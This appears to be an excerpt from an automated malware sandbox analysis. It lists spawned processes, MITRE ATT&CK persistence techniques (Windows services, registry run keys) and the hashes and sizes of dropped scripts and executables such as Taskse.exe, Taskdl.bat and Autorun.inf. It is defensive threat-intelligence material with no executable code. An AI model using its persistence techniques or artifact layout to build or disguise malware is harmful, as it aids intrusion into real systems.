C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Persistence
- Create or Modify System Process: 1
  - Windows Service: 1
- Boot or Logon Autostart Execution: 1
  - Registry Run Keys / Startup Folder: 1
Privilege Escalation
- Create or Modify System Process: 1
  - Windows Service: 1
- Boot or Logon Autostart Execution: 1
  - Registry Run Keys / Startup Folder: 1
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbsFilesize
240B
MD5482dcfe952218cf31ad2adddd8f6616b
SHA17a6bcfce28c76bc3319c871696531d21200f3bc0
SHA256093b0f0c3f7a9bf24406662245b57f171837a266aba49f198319045e971e77d5
SHA512440182ba5cd7c85abc11fe9097a41486469afde738d26f471efe4e7928106cd57240b1045bc97d60c42147ca25b032c4149487f1a1ab4581292c7eff2bc801b9
-
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbsFilesize
300B
MD588a2fcd93445c8b092324fe1236d31dc
SHA1f63653fe34d54b7e42e29689a934ed097329128d
SHA2560783070444c465de8a21f7fc41f61d2bd535e995454e4086b2e01780e96ad419
SHA5123e44cce194b1cc3d6946d33dee6756f0333edc886f9ebe8149887c2e9b35867575ed47f15b2c384ed37aab3b8e37dae3369e1259d132bdf9bb832c70c09e8085
-
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbsFilesize
360B
MD58d485f3ac2acb6e586e8f1d8af2df57f
SHA143e9653ecedbad263a5e015ecaa3eebb7a44feb9
SHA256530f6ebaf4445acb0855efc516729598a3312aeedd0ef9024da6f347f152e783
SHA5124105fa612f86d46457f77449c095cd9e1f59dcb4d137bf3d822e4f52f89c517faadfbaa00b07d15aabfc0d2afdb093ea63d59add313525149f17b7427917494b
-
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbsFilesize
364B
MD58a1e8a336fb4639a5f9f85e4417516ac
SHA10c2393a558f68d22eb50ac95c268ed66c9f883c0
SHA2562776104023c77a2449874fe9b993f60c888d5cf39c0dec6af58f6de3ad60891e
SHA512af20a4c27eac58291bd6d3f5ea3c84d0f4664b2e0976e539a24a697d63915150e8109be34bd090152b9d2811fd7474ce4a15a606d839dc06fee763a77d648e3c
-
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbsFilesize
418B
MD536f91be4ea85d6c60d2510f11c262450
SHA12f237de20b3fda59a95715b594f7c2cbb62780ef
SHA25626b6058b26dae9bad82e905cefd2af33c3e2d05ecad36a8acf6a463ce7146a8a
SHA5121fe07ef12945c6b6a55d3bf79021b1f91db914eebfe14f6b37a774b7fb6acbe0fb4a049c288a51d4a5e96a74a84031efc39627b5b23ed65570890b3e20208352
-
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbsFilesize
422B
MD5e6005e421d9766162aefe5b9059d92ef
SHA127744401691c560cefdc459dc46893812fa37899
SHA256205bbec740eedef0e9197effc84e441ba37bae4e95a25df929b738f07a7ef65e
SHA51297c43d4f912fd16117bcf56d0f2c4206ccd8328a0296510894b5998c96ee21ca3d7366971aa55c0985f0b06da67ebd18a7f0771c4bef4adfb7f9d84455580a4a
-
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbsFilesize
472B
MD5e03ab991e39b2cc5f61a97a8005484b3
SHA17e15add76c5198dda5878df2165c0075d5f80a02
SHA256354afbd52e763d4f7a061269b92fd33bcf18072bcc27a37efc730ab232017c2a
SHA51250e745449a5c9fedb85cb77235f9c4cfefc35444fc6c3a39425f3662cf436d65ec29ca8cca1ec765668d90c9f62be4c4a073cdae5dec14091675990ad292ed99
-
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbsFilesize
60B
MD511aa52a7eca2cf8fdcd1584b5a8b6026
SHA101ae6066e6b3879cb0caf306cc91077b7c0bea1e
SHA2568dfd0a6db2df60455840dbbbcc4f8b70d730ba1c2afbf300316898b3dd3e9b11
SHA51207f37c050eb59e7a1a228ca851d05ca9b62bb3de97f988fb36c374c827833c8c551e5cb51eb05130861c0b35515ca77ae667ca97ee4f08c86cdf9f6fb64533c5
-
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbsFilesize
124B
MD59405c1b285eae838c1668b989757c5c0
SHA100630d4b84e3a1cf7b48d579bfd0d40503894cc5
SHA256bbd4c13edfbcf576f6a9d61bffd41442ae08b1b0b064d3a9c10670d73cda2691
SHA51264516ca2a771500a29dbe26ac2637445f9007a9bd904f479d191157cd59105e809c7858c059be5734c6e4a124930c651978321a07dd0fdf945a66d7b194fed8e
-
C:\Users\Admin\AppData\Local\Temp\Autorun.infFilesize
296B
MD5b20421aba6b1738af56e402aed7b5fca
SHA17b9e8f147c25a383e775cf4ce66fec5f050f8187
SHA2562b11af7c3e34fcb9851881ecb06ee601696a6e29b3d3f283f79b118bdba35ecd
SHA51232eb6ae6c4009d43422f6abad7cd88f21b3efbd85c4a8c1fa45675f59f5c7a1d0839c6f73131522de5c0f5f1cec2dc9b4e2b00dbe68e060390cc5b6174ef9683
-
C:\Users\Admin\AppData\Local\Temp\Autorun.infFilesize
444B
MD5929d76643e667f8d6faa590f5cfee782
SHA1e120fdfc91c88681f835b703c336908b9cd4b649
SHA256dedb3209e6ffe8a68578145eda5a34b9f64108c4ccb3b228fb9fa3d7ada5380a
SHA512bfd61aaf55a50d3c4bbb0386ac02aebfdf14fb8d009bc47eb0e6398b49229222e3c0b7d23b22b235efa14398d6340084d0b9b683bbd9c3ab2f66c0a6d27a4171
-
C:\Users\Admin\AppData\Local\Temp\Autorun.infFilesize
74B
MD5b39df423c6e5978065a9a8ec4879a3b4
SHA196441a7a7d8090f7a96a1160f539531f66568e88
SHA25612a5135510016abcfe1192aceb6fec42634346661d778d68be1debaa3d75e967
SHA5122d583fcae1ec73f836c5b66b8b1337bb4250a8230073de96d501a4fab5f522b75599ac2a1fcf1457a841d8c84bcccb88feade82f49357b28345c63d9526cfeb4
-
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbsFilesize
210B
MD595cc1e097d7663506eb09a5526dddb43
SHA16e3a4a7ec62920f45f935d8153507d552462969e
SHA256d2d61148bf3befe5af5c277e726f487e7bbc833a7f8783013b4b3076885e0f25
SHA512136608646ee72f0df3dad077ec45b5487b99c7633351b239b2c072574958896c8e2f59c67c814963acb5ff85cc6f499587e0b5163c56a95cc3dd4dd96ec3982f
-
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbsFilesize
216B
MD57659392a12010d8c761cb9888f6fd5ac
SHA1b8829c26628740b77ab7405c231f420e860d8c1f
SHA25671bd0bffdeca9dce2b4e9e1d767a0732657032171f3ad33903dec353ef95a431
SHA5125caf94b288649b687f411cbb5519168e09e161f8d9545a6bad1b0d08876a542d153a115f8b44e3f15d973812ce8ec7471bba7d8bd0b9a22d0abf6fdf2914a2bf
-
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbsFilesize
270B
MD5adad2cd23a8880d4b3bdb1481c5b7998
SHA1823fc1acc3e7a3f0cffab5cb8fa453a8c0d1872c
SHA256838ba55eb15df2e0145178a20b4d01314d0fcde04ff871649012eaeba6bbfb69
SHA5128c600e32157daef85549d0a19a40f38e812e05cbf24e51453fa1ea94435e55fe4a705e77d42a4f63f3c565da98b4e69f1ed7bb6f3dbca65e80b17526954e60e4
-
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbsFilesize
278B
MD5a8217e02508029f70e586635bc6db873
SHA1ab19e9a21282b68f2c8c67953105ab95b05e6168
SHA2569aea836aed56a879f2b62d11ca2d35f4a56620956d6bc9fa2bbf4aee24249787
SHA51233074686fa13c9bf8225e5bdce20ade67a4d8170c1595fed599f6716415ffc42e6b7376eda032079c4a2048d5df78c1f2b19c5825889ce6589315e487b77880a
-
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbsFilesize
322B
MD5884f70a3ed9a7041b56cc7ba0406690a
SHA1cbc662c19bc17f4a3bc65023756d119524be41c7
SHA2562c77a2b0c246250654e81db9bd70c37a2b63ad5599e0a596a023c637f56b18dc
SHA5125137be404bb3cffaee68de2ec098f8f1082ad8d8721ce393d3a8eb0b9a19016f952e08b36211c747f1da429643b59c351ed08f04f14750d186f1206e57fa7bda
-
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbsFilesize
372B
MD5202ee189b9ff22489d7a78927b33ce16
SHA1df1271f89a78a3d81284da3bba733aa55405d134
SHA256c494c2a32396c8986bc080ae1f6b27f0eb20a2ef6313de3c52d80e65aae50b18
SHA5123202f32a8198995fc7fe78a20a6d10c77fa56bec68470636cf04b779d718b297ab83f113387d4112b0f2641651bfcf4bf75ef0db41cab8e64ef71850f19ef143
-
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbsFilesize
378B
MD55f0f3520c7a8ad2f7615a078ab7f2c27
SHA1b14a9682cdc497b591b9fa49862d1836866f4118
SHA256bf87cfcd1055e3750624ecae6ff5a20c17f16eb6c1157452ffc47291554f958b
SHA512f017fe043ac9c251bdaae7718917b4320f1730b4b61137642e1b08415b1362e70b4018e36a79ea3d79dc877fe6e39cb95455e40e1daa4fce70d9dc3d83126cb2
-
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbsFilesize
438B
MD58e73772231c96ac082deedd0f0432dbf
SHA1b16522532236762305736c69b174cbefe8935ddd
SHA2561e08a9083870173f8672f8aa8d1270212fe2b4dbb8047d4a90998f109e59a644
SHA512028fa984a25fe9fdb6c843da68bd09b0ce80ec4a8a445c64906f4dbb2e708988195f691f0df8f67633b7883e50c3864079b86706e18a2af8143d659f085e9657
-
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbsFilesize
54B
MD5888e64c554686bbbc0499057cce1af36
SHA15a7f51c66e3ae7dd0e0231c9817aee8c9fc54006
SHA256616cf19739e00c69e9606d9c94869f6fcb6a7b3860e7b8af9bc896f3081dad0d
SHA5129882375fdd09d489258447d49b8b63d0bc8db57cdb7186500c00c79d57f30af5f37a69e8fab70683a7c9d730e3484ef537ee57bb1892a84f92e9aba639d1d227
-
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbsFilesize
162B
MD5d5980bf4b018e4c397df95afe8941c66
SHA1ce53c669a898d09479831bc59bc31a5fba2a6f2b
SHA2569afd004a8cb9b9e8b1eeab780fb0c4ffa39c3ec2ded034b1a7cd69db7f67872a
SHA512c995f9d3252b9a7af52a398562261baf3297fee64fade9de22895cce017e5aa097c7935a0519e474253a181e1e018348a1ade3d953bfaff5dc43e30e2d9fde5f
-
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
Filesize 138B
-
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
Filesize 276B
-
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
Filesize 345B
-
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
Filesize 418B
-
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
Filesize 69B
-
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
Filesize 692B
-
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
Filesize 865B
-
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
Filesize 173B
-
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
Filesize 2KB
-
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
Filesize 346B
-
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
Filesize 18KB
-
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
Filesize 23KB
-
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
Filesize 4KB
-
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
Filesize 9KB
-
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd
Filesize 462B
-
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd
Filesize 231B
-
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd
Filesize 158B
-
C:\Users\Admin\AppData\Local\Temp\Twain_20.dll
Filesize 17KB
-
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
Filesize 22B
-
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
-
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
Filesize 11B
-
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
Filesize 44B
-
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
Filesize 71B
-
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
Filesize 76B
-
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
Filesize 49B
-
C:\Windows\Debug\WIA\wiatrace.log
Filesize 3KB
-
C:\Windows\Debug\WIA\wiatrace.log
Filesize 4KB
-
C:\Windows\Debug\WIA\wiatrace.log
Filesize 6KB
-
C:\Windows\Debug\WIA\wiatrace.log
Filesize 7KB
-
C:\Windows\Debug\WIA\wiatrace.log
Filesize 9KB
-
C:\Windows\Debug\WIA\wiatrace.log
Filesize 1KB